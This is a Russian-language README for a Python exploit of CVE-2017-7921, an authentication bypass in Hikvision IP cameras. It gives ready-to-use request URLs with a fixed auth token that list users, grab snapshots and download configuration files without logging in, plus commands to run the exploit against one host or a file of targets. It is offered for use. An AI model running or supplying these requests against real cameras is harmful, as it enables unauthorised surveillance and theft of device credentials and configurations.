
Эксплойт на Python для CVE-2017-7921 в IP-камерах Hikvision, выполняющий неавторизованное перечисление пользователей, захват снимков и загрузку конфигурационных файлов с помощью специально сформированных HTTP-запросов.
Проблема некорректной аутентификации была обнаружена в устройствах Hikvision.
Уязвимость некорректной аутентификации возникает, когда приложение не выполняет адекватную или корректную проверку подлинности пользователей.
Это может позволить злоумышленнику повысить свои привилегии в системе и получить доступ к конфиденциальной информации.
https://seclists.org/fulldisclosure/2017/Sep/23
Детали уязвимости:
----------------------
Получить список всех пользователей и их ролей:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Получить снимок с камеры без аутентификации:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
И хуже всего — можно скачать конфигурацию камеры:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
